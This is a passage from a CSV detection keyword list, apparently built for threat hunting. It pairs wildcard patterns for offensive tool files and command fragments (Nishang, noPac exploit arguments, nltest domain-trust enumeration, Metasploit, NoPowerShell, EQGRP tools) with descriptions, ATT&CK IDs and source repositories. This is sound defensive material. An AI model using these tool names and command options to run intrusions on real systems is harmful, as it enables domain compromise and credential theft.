a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.ps1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*nishang.psm1*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*NixImports by dr4k0nia*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*NixImports.csproj*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*NixImports.exe*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static 
analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*NixImports.git*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*NixImports.sln*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z" +"*njpmifchgidinihmijhcfpbdmglecdlb*","greyware_tool_keyword","Trellonet Trellonet","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nlbejmccbhkncgokjcmghpfloaajcffj*","greyware_tool_keyword","Hotspot Shield Free VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*nltest /all_trusts*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - 
T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nltest /dclist*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*nltest /domain_trusts*","greyware_tool_keyword","nltest","enumerate domain trusts with nltest","T1482 - T1018","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","10","N/A","N/A","N/A","N/A" +"*nmake inject_local *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*nmap -*","greyware_tool_keyword","nmap","A very common tool. 
Network host vuln and port detector.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"*nmap * --script=*.nse*","greyware_tool_keyword","nmap","check exploit for CVEs with nmap","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation Tools","https://nmap.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*nmap -Pn -v -sS -F*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*nmap-*-setup.exe*","greyware_tool_keyword","nmap","When Nmap is used on Windows systems. it can perform various types of scans such as TCP SYN scans. UDP scans. and service/version detection. These scans enable the identification of open ports. services running on those ports. 
and potential vulnerabilities in target systems.","T1046 - T1065 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*nmap/ncrack*","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","10","972","238","2023-02-22T21:33:24Z","2015-12-21T23:48:00Z" +"*nmap_port_scanner.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*nmap_port_scanner_ip_obj.py*","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1842","1638","2023-08-12T21:49:36Z","2021-01-07T16:11:52Z" +"*nmap_smb_scan_custom_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*nmapAnswerMachine.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*nmap-elasticsearch-nse*","greyware_tool_keyword","nmap","Install and update external NSE script for nmap","T1046 - T1059.001 - T1027.002","TA0007 - TA0005","N/A","N/A","Vulnerability Scanner","https://github.com/shadawck/nse-install","1","0","N/A","7","1","3","1","2020-08-28T11:27:08Z","2020-08-24T16:55:55Z" +"*nmap-reverse-lookup*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. 
This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","10","10","4","2","2023-10-04T12:32:38Z","2023-04-28T01:58:18Z" +"*no Mimik@tz - loaded successfully*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*no_session_payload.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*NoApiUser.exe*","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/lengjibo/NetUser","1","1","N/A","10","10","410","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z" +"*noclient: failed to execute %s: %s*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell 
spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"*node stealer.js *","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","0","N/A","10","2","152","10","2023-09-06T12:25:08Z","2023-08-02T14:30:41Z" +"*NoFault\NoFault.*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*NoFilter.exe *","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","0","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*NoFilter-main.zip*","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","257","42","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" +"*nop_shellcode.bin*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*noPac * -dc-ip * --impersonate *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*noPac.* -create-child*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -dc-host *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation 
tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -dc-ip *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -domain-netbios*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -dump*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -hashes *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* --impersonate *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -just-dc-ntlm*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to 
impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -just-dc-user *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -new-name *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -no-add *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -pwd-last-set*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -service-name *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation 
tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -shell*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -shell-type *","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.* -use-ldap*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.csproj*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*noPac.csproj.AssemblyReference.cache*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*noPac.py*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to 
impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/Ridter/noPac","1","0","N/A","N/A","7","643","112","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z" +"*noPac.sln*","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" +"*NoPowerShell.cna*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.cna*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any 
PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.Commands*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.dll*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*nopowershell.exe*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.exe*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"*NoPowerShell.sln*","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
